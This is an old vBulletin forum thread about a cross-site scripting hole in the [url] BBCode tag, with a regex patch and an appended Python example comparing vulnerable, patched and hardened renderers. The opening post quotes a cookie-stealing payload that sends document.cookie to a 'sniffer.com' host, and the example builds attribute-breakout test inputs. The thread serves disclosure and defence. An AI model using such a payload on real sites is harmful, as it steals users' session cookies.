Security problem (javascript in urls)

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Security problem (javascript in urls)

    If you take a look at my signature, you will see an example of javascript in the url vB code tag, which can cause serious security problems. I have only tested this on 1.1.4, but the admins on that board had to close down vB code totally to fix the security problem caused by things like onmouseover="window.open('sniffer.com/script?'+encode(document.cookie));

  • #2
    This is very severe! 1.1.6 is still affected.
    I'm writing my own patch at the moment to stop this one from becoming a disaster.
    Will post it here when I'm done...


    • #3
      This is pretty cheesy, but it works:
      Change line 253 of global.php from:
      [code]$bbcode=eregi_replace("\\[url\\]([^\\[]*)\\[/url\\]","<a href=\"\\1\" target=_blank>\\1</a>",$bbcode);[/code]
      to:
      [code]$bbcode=eregi_replace("\\[url\\]([^\\\"\\[]*)\\[/url\\]","<a href=\"\\1\" target=_blank>\\1</a>",$bbcode);[/code]
      You'll have to insert the \\\" for the email tags too (a few lines down in global.php):
      [code]$bbcode=eregi_replace("\\[email\\]([^\\\"\\[]*)\\[/email\\]","<a href=\"mailto:\\1\">\\1</a>",$bbcode);[/code]
      Last edited by Matthijs; Tue 17 Apr '01, 1:16pm.
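The following Python is an added example, not code from this thread or from vBulletin. It reproduces the three stages discussed above as regex-based renderers so they can be compared on the same input: the original [url] replacement (anything but "[" is accepted and dropped straight into href), the patched pattern from this post (a double quote is also rejected, so a quote-bearing tag is left as literal text), and a further hardened variant that goes beyond the patch by allowlisting the URL scheme and HTML-escaping the attribute value. The sample posts, the scheme allowlist and every function name (render_original, render_patched, render_hardened, injected_event_handlers) are the example's own assumptions; the constructed payload mirrors the attribute-breakout shape quoted in the first post.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample posts (not from the thread).
SAFE_POST = "see [url]http://example.com/page[/url] for details"
# Same shape as the breakout quoted in post #1: a quote closes href early
# and a second attribute follows it.
BREAKOUT_POST = '[url]http://example.com/x" onmouseover="alert(1)[/url]'
SCHEME_POST = "[url]javascript:alert(1)[/url]"

# Stage 1: the original vB 1.1.x pattern, anything except "[" is the URL.
ORIGINAL_URL = re.compile(r"\[url\]([^\[]*)\[/url\]", re.IGNORECASE)
# Stage 2: the patch from this post, a double quote is rejected as well.
PATCHED_URL = re.compile(r'\[url\]([^"\[]*)\[/url\]', re.IGNORECASE)

ANCHOR_TEMPLATE = r'<a href="\1" target=_blank>\1</a>'

# Assumed allowlist for the hardened renderer (not something the thread specifies).
ALLOWED_SCHEMES = {"http", "https", "ftp"}


def render_original(text: str) -> str:
    """Line-253 behaviour: the raw URL text lands inside the href attribute."""
    return ORIGINAL_URL.sub(ANCHOR_TEMPLATE, text)


def render_patched(text: str) -> str:
    """Patched behaviour: a URL containing a quote simply never matches."""
    return PATCHED_URL.sub(ANCHOR_TEMPLATE, text)


def render_hardened(text: str) -> str:
    """Beyond the patch: require an allowed scheme, then escape the value
    so no character in it can terminate the attribute or the tag."""

    def repl(match: re.Match) -> str:
        url = match.group(1).strip()
        if urlsplit(url).scheme.lower() not in ALLOWED_SCHEMES:
            # Disallowed scheme: show the tag as harmless literal text.
            return html.escape(match.group(0), quote=True)
        safe = html.escape(url, quote=True)
        return f'<a href="{safe}" target="_blank" rel="noopener">{safe}</a>'

    return ORIGINAL_URL.sub(repl, text)


class _AnchorAttrs(HTMLParser):
    """Collects on* attribute names found on <a> tags, using a real HTML
    parser rather than a regex so escaped text inside href is not miscounted."""

    def __init__(self) -> None:
        super().__init__()
        self.event_attrs: list[str] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        if tag == "a":
            self.event_attrs.extend(
                name for name, _ in attrs if name.lower().startswith("on")
            )


def injected_event_handlers(rendered: str) -> list[str]:
    """Detection helper: event-handler attributes that ended up on an anchor."""
    parser = _AnchorAttrs()
    parser.feed(rendered)
    parser.close()
    return parser.event_attrs


if __name__ == "__main__":
    for name, renderer in [("original", render_original),
                           ("patched", render_patched),
                           ("hardened", render_hardened)]:
        out = renderer(BREAKOUT_POST)
        print(f"{name:9s} handlers={injected_event_handlers(out)!r:16s} {out}")
```

Running the block shows the original renderer emitting an anchor that carries an onmouseover attribute, the patched renderer leaving the tag untouched, and the hardened renderer producing an anchor whose href merely contains the escaped quote. The detector parses the rendered HTML instead of grepping for "on...=" so that the escaped text inside the hardened href is not reported as a false positive.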